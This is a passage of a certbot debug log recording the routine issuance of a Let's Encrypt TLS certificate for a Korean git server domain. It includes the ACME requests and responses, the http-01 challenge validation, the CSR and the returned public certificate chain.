"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0NWb1gxNVhxeEhjSDhFd0xZN21VMGZoYzVpdS1XOEU5NWRXUEk5X1RHSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0", - "signature": "N6i0RDdH_G5bVERBFzfAVluCZhhP2xSxxI7hxgoPJMPZM70W3Qh9XWQE_nhQ4MKRuTmMeWT8tCk6bd-EJaengkWN1gNIVvO52HigUYqZaIMF0GD0nbk4IBchm-fSbmP6-iypz0l-NiOwVQlQ-bzcZpjzaEXaJJ0UN42bJNKwuri_JGsg1plUK0tryOkH5prUI1Uie21HHJI41SGT02mUBsPRGR6Ef3xAVPjNYJUt73iG780B6fQgYxz81h_P2tFI5-BKzLq-Z6k2S_dDbE4qvRmB6yGEyhMa32myHj_uvGTviXnkUeCN145_rVW-uwTyMc3xf78O6bSK-eNPW-A2nA", - "payload": "" -} -2026-02-15 01:51:52,540:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826 -2026-02-15 01:51:52,541:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:52 GMT -Content-Type: application/json -Content-Length: 826 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvB1NFpJwJJf_Ae4W9KuOSW8LOksIsULxEYip-Juqi8PIQ -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "git.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-22T01:51:50Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - } - ] -} -2026-02-15 01:51:52,541:DEBUG:acme.client:Storing nonce: 4AH-2vvB1NFpJwJJf_Ae4W9KuOSW8LOksIsULxEYip-Juqi8PIQ -2026-02-15 01:51:52,542:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'} -2026-02-15 01:51:55,542:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:51:55,547:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjFORnBKd0pKZl9BZTRXOUt1T1NXOExPa3NJc1VMeEVZaXAtSnVxaThQSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0", - "signature": "aeilg5d0s3qXqzNgy5o4cI0bUyNxIYqVvjXF8tvdBmsE1iUpYFYWDzXl7oEmAxua5q8E2U6JkBHdgPJ_vsZd3z6B_557GAG1AVnOQacxvVpHLkvw-m8BVVYkonCM19Fb0NbYRJHfhNGXn_EnoiXmuOfkcdBmjk-7vj3lT2tPcjQTNBdJu7i6QZHdP5ucPjJYSbRzZbd_LLI385LPvFmgAZBlCL_0dYBUNrP2uqNF45WNaceJUqIjYyUb5tRGF4xjXqcQD2rg2EndgVKCEHRF2fTheOjD-2jeoADDgf0E6OC8eVc704K_vASf6nsVQPnof9U3A8EjijoEH1a6kpsxEQ", - "payload": "" -} -2026-02-15 01:51:55,717:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826 -2026-02-15 01:51:55,718:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:55 GMT -Content-Type: application/json -Content-Length: 826 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvB61k-bHUD2nLTVwKznjz8siFeraoWuDQ8EfVBNIm65n0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "git.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-22T01:51:50Z", - "challenges": [ - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - } - ] -} -2026-02-15 01:51:55,718:DEBUG:acme.client:Storing nonce: 4AH-2vvB61k-bHUD2nLTVwKznjz8siFeraoWuDQ8EfVBNIm65n0 -2026-02-15 01:51:55,719:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'} -2026-02-15 01:51:58,719:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:51:58,724:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QjYxay1iSFVEMm5MVFZ3S3puano4c2lGZXJhb1d1RFE4RWZWQk5JbTY1bjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0", - "signature": "Bf3p3q3x5ird5lIrcYEqZFpBjd7vZp3yT_VhYkDIOkm40183LdxR5LDHsSfrKxFeqKdRBQuPfUuCpRBrelnYNi9o0Cd0QAIPiX1Hi42d66kJxgRyXfK7RdoJCU-Uz-mxqdjjyfNccdvfMLw5q1G3h0_OIF9uG9aqgvzfiHlqRjkgWCKssljiK8inROYYBdnwagXLY8pczDgBBTkFixYe5jWERqNy707OWr8221oirH7pLJOKPKHhX3auh83Ag7sYCJjdfRQQy23T4aO361QbGoc-iDQaJh0OdffiwWcK9eXDZcsnffnAmw-fOcPfkAGQ7dFFp_ID4nRtUVGseutg7g", - "payload": "" -} -2026-02-15 01:51:58,935:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 777 -2026-02-15 01:51:58,936:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:58 GMT -Content-Type: application/json -Content-Length: 777 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGIbNKaCBMKC63TiK-p6jRjvD008EcbuzJwDcYDsYMei8 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "git.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-17T01:51:57Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ", - "status": "valid", - "validated": "2026-02-15T01:51:51Z", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0", - "validationRecord": [ - { - "url": "http://git.hanmocnn.co.kr/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0", - "hostname": "git.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-15 01:51:58,937:DEBUG:acme.client:Storing nonce: NeKnt8TGIbNKaCBMKC63TiK-p6jRjvD008EcbuzJwDcYDsYMei8 -2026-02-15 01:51:58,937:DEBUG:certbot._internal.error_handler:Calling registered functions -2026-02-15 01:51:58,937:INFO:certbot._internal.auth_handler:Cleaning up challenges -2026-02-15 01:51:58,938:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0 -2026-02-15 01:51:58,938:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up -2026-02-15 01:51:58,938:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKDCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3ZB1deeblgoVMoPU\nK2iFU5FbwLKFHWK/JtLfmdLhuzQRDtQMR3pV5A4W8NWINvFWEcWdRH2Rqv0uIwWe\nsQZYRHcCcCGIZvYcF+dmwsZ1jLge9RSo/+kLdhLXyZ754afZoDAwLgYJKoZIhvcN\nAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0E\nAwIDaAAwZQIwaW490qutHUvSKLq5U2DIOTyCJERSKZFL13USO3MYRJbSBz11vK7r\nAgJ7e4qKXzqWAjEA8ONFmEjWmt2839uiJ6vbkLL7Jq5n2Uh8a9LdcNA5cybkohXZ\n0tSqH7xYtqphQHJK\n-----END CERTIFICATE REQUEST-----\n', form='pem') -2026-02-15 01:51:58,939:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-15 01:53:28.939521 -2026-02-15 01:51:58,940:DEBUG:acme.client:JWS payload: -b'{\n "csr": "MIIBKDCBrwIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3ZB1deeblgoVMoPUK2iFU5FbwLKFHWK_JtLfmdLhuzQRDtQMR3pV5A4W8NWINvFWEcWdRH2Rqv0uIwWesQZYRHcCcCGIZvYcF-dmwsZ1jLge9RSo_-kLdhLXyZ754afZoDAwLgYJKoZIhvcNAQkOMSEwHzAdBgNVHREEFjAUghJnaXQuaGFubW9jbm4uY28ua3IwCgYIKoZIzj0EAwIDaAAwZQIwaW490qutHUvSKLq5U2DIOTyCJERSKZFL13USO3MYRJbSBz11vK7rAgJ7e4qKXzqWAjEA8ONFmEjWmt2839uiJ6vbkLL7Jq5n2Uh8a9LdcNA5cybkohXZ0tSqH7xYtqphQHJK"\n}' -2026-02-15 01:51:58,944:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0liTkthQ0JNS0M2M1RpSy1wNmpSanZEMDA4RWNidXpKd0RjWURzWU1laTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwNDA4ODIwOTg2In0", - "signature": "Ukf2rgjKwRIhy_p0rhlecNFkjSaEyuOoxgZ3lO2zYspObZ2xUft9pdZkpYYeBBPZijLo0z_BjPzUZxKi7da69adu2bVbHRmMEVtlilSY346fAU7oo4NUl8Vs7db33H4FeM623R-EGnTozPzeVAu6nzAwlzg5q7LUSjXy_fEP1f7u1mDDI8o81qnEhmje-UiLRAVsYg88gNf_NIo3Bhfb5tyPcJV12OXHxnGo-4Yisd3IH-x5k0aVzKp6CZ6wgW70Lgtx6cW222yUrk-3MBSFBO3n5WGn2e1dKX0tBqiYcuEoqrSH8qf50bIL41g8ty5SjzONuyIUo_KUaLTIRUZBZw", - "payload": "ewogICJjc3IiOiAiTUlJQktEQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFM1pCMWRlZWJsZ29WTW9QVUsyaUZVNUZid0xLRkhXS19KdExmbWRMaHV6UVJEdFFNUjNwVjVBNFc4TldJTnZGV0VjV2RSSDJScXYwdUl3V2VzUVpZUkhjQ2NDR0ladlljRi1kbXdzWjFqTGdlOVJTb18ta0xkaExYeVo3NTRhZlpvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKbmFYUXVhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhQUF3WlFJd2FXNDkwcXV0SFV2U0tMcTVVMkRJT1R5Q0pFUlNLWkZMMTNVU08zTVlSSmJTQnoxMXZLN3JBZ0o3ZTRxS1h6cVdBakVBOE9ORm1FaldtdDI4Mzl1aUo2dmJrTEw3SnE1bjJVaDhhOUxkY05BNWN5YmtvaFhaMHRTcUg3eFl0cXBoUUhKSyIKfQ" -} -2026-02-15 01:52:01,344:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480408820986 HTTP/1.1" 200 454 -2026-02-15 01:52:01,344:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:52:01 GMT -Content-Type: application/json -Content-Length: 454 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986 -Replay-Nonce: 4AH-2vvBzRXHMbksCZ9MitMQBxuAI6PDVAP-3e54n20kYQvuOz0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-22T01:51:50Z", - "identifiers": [ - { - "type": "dns", - "value": "git.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a" -} -2026-02-15 01:52:01,345:DEBUG:acme.client:Storing nonce: 4AH-2vvBzRXHMbksCZ9MitMQBxuAI6PDVAP-3e54n20kYQvuOz0 -2026-02-15 01:52:02,345:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:52:02,350:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QnpSWEhNYmtzQ1o5TWl0TVFCeHVBSTZQRFZBUC0zZTU0bjIwa1lRdnVPejAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwNDA4ODIwOTg2In0", - "signature": "jIOWDfbpSclKLuMx3QNoqmW8J4i1EJ1IYnOzI3eV2bSQkEFKG5OE5NOnL72UA1PpQZnlvc95NYjxoW2tjBlXQKKHAqoAmiq0ivoAQhb14KcV8TZKs7QqG6_broa6iXrBUHpEzK4njjtDoDYwczCt-lQgLNczaflbLBsAX-BkoGSQRYyg4NxblkbT-gGYqd5r5WKCDahRQS4jXSF0pyY8Nym6dipk5JVWoRqqRGWzMpcvLtArLqdJTT2aHdWLP4FfO79_eASLhRHb-65Hbzqvel0OAXDKf1oFlIQqOpyxyvXU4EeSkVTfo15TIPn8gwwWGuPrJicVtj-OX0uFIJywRw", - "payload": "" -} -2026-02-15 01:52:02,549:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480408820986 HTTP/1.1" 200 454 -2026-02-15 01:52:02,550:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:52:02 GMT -Content-Type: application/json -Content-Length: 454 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986 -Replay-Nonce: NeKnt8TGkqXwrDlo3sRFrYaf3v4XwpOPFLYdKHKI5vRZk1dZOn0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-22T01:51:50Z", - "identifiers": [ - { - "type": "dns", - "value": "git.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a" -} -2026-02-15 01:52:02,551:DEBUG:acme.client:Storing nonce: NeKnt8TGkqXwrDlo3sRFrYaf3v4XwpOPFLYdKHKI5vRZk1dZOn0 -2026-02-15 01:52:02,551:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:52:02,555:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2txWHdyRGxvM3NSRnJZYWYzdjRYd3BPUEZMWWRLSEtJNXZSWmsxZFpPbjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU0ZTM2ZTlmNDJhYWJhZjcwMzg3NDE4YjYyYWY5YjJhZTlhIn0", - "signature": "nz8-mSztJHODU29TN2pD_L46rJK8QVsmtb1_QbSXQRyk754h8k1Q8XSnP8tzOcKtA395gCZWX3hP1oeBxnjUOFM8tT7jBT41GP5BjL0Qvy5xhReAiIX4e6JKtAcV8p4ooW8vBLwhPao8NkebadKwRSN5XzprOAvEQnzUN7mMrTykTRPSl81nkAVg0I5iD8y8PqS16ZrlpJdaeuECh_YnZVAiA64Q1bUY1vOCfY6z655MlhdxGOhE1EziZRjFrWR8zAXsSO5r_5lMd04JUujOK7bR_PVNdgWHirPx-KwaaOIzghYgbG86saj_I7oK-54fxmZCoc-jX2rQ5zeZSduHUw", - "payload": "" -} -2026-02-15 01:52:02,716:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a HTTP/1.1" 200 2893 -2026-02-15 01:52:02,717:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:52:02 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2893 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: NeKnt8TGUmr5hRmt5v4kyV_zjaCxjD5GACGBv7voiKKjqOzNOfw -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDpTCCAyugAwIBAgISBU426fQqq69wOHQYtir5sq6aMAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -NzAeFw0yNjAyMTUwMDUzMjlaFw0yNjA1MTYwMDUzMjhaMB0xGzAZBgNVBAMTEmdp -dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABN2QdXXnm5YK -FTKD1CtohVORW8CyhR1ivybS35nS4bs0EQ7UDEd6VeQOFvDViDbxVhHFnUR9kar9 -LiMFnrEGWER3AnAhiGb2HBfnZsLGdYy4HvUUqP/pC3YS18me+eGn2aOCAhcwggIT -MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E -AjAAMB0GA1UdDgQWBBRaL2bTWA0MjQBBBgZygk0nxCro8jAfBgNVHSMEGDAWgBSu -SJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG -Fmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u -LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0 -dHA6Ly9lNy5jLmxlbmNyLm9yZy8yNy5jcmwwggEFBgorBgEEAdZ5AgQCBIH2BIHz -APEAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxe/1qdAAAE -AwBIMEYCIQDwNplXasmzKSLIez7kR/jYwBmY+92fo0Oe9xTRW/LYwQIhALQ+kEkk -pUvSpkEcvMoHJVABdfGiHZZbWkgt7CSOPBySAHYAFoMtq/CpJQ8P8DqlRf/Iv8gj -0IdL9gQpJ/jnHzMT9foAAAGcXv9irwAABAMARzBFAiBKJHYXSD4GUqumXq5TLt3A -HS9ZM08kl/NzaSz0eNoTAgIhAMldLvgzn+UR9VyLT3n2KT6n82wIo035yLwnogk5 -KY/lMAoGCCqGSM49BAMDA2gAMGUCMQDBWHS4t+nwA0lkvbQcsUqQq3uabapszHs1 -ZVOVAO4J+Vfx3wgTRO8Dx8F33rBWndYCMGC0CN463ukm+NgQt/ByckZ2/rxaUm9S -AhNC3oI5CvlMIrXyWD67+cCSiTNiQIuD7A== ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw -TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh -cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw -WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg -RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST -CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef -QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw -gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD -ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 -wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB -AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g -BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu -Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD -aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF -h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG -yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr -OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o -yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S -M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ -UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq -Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I -tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ -YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty -+VUwFj9tmWxyR/M= ------END CERTIFICATE----- - -2026-02-15 01:52:02,717:DEBUG:acme.client:Storing nonce: NeKnt8TGUmr5hRmt5v4kyV_zjaCxjD5GACGBv7voiKKjqOzNOfw -2026-02-15 01:52:02,717:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:52:02,722:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1VtcjVoUm10NXY0a3lWX3pqYUN4akQ1R0FDR0J2N3ZvaUtLanFPek5PZnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU0ZTM2ZTlmNDJhYWJhZjcwMzg3NDE4YjYyYWY5YjJhZTlhLzEifQ", - "signature": "aTci7u9FnehWBU47wxbqDk_wQMGYWTZ17fy0whShTkXp1gcAO8M_DnkNnOzHUZuuC1rSqMv-y3qHuxBBjJFkwx-Ho8YLu5mhyFCAQf46VOSeoTwz4DabP6Sr5OrJ-4PhtuPFdqr9ie1cZEGuzkYUSiCsjX-hdRJtw5cci1BR36DMELHIXKXGAml65MDbIcKHyxcvbtSxkW768HLeStjkzt60g3yay8TEj_WSHCYSAvHWrUBWFov_jefguOq31sKGu-fS5B-qiMbxBYo6E3ADP7qRVtvQ2QJXRAGBMXgr8UQTRmSK0buO7limyayfbOG-7CfrbUH9mw60pRfK4xyy0Q", - "payload": "" -} -2026-02-15 01:52:02,883:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1 HTTP/1.1" 200 2328 -2026-02-15 01:52:02,884:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:52:02 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2328 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: NeKnt8TGzFhXu6tguKanBavnkUUb9vcvolh2BEjWZPFJHUOKePA -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDpTCCAyugAwIBAgISBU426fQqq69wOHQYtir5sq6aMAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -NzAeFw0yNjAyMTUwMDUzMjlaFw0yNjA1MTYwMDUzMjhaMB0xGzAZBgNVBAMTEmdp -dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABN2QdXXnm5YK -FTKD1CtohVORW8CyhR1ivybS35nS4bs0EQ7UDEd6VeQOFvDViDbxVhHFnUR9kar9 -LiMFnrEGWER3AnAhiGb2HBfnZsLGdYy4HvUUqP/pC3YS18me+eGn2aOCAhcwggIT 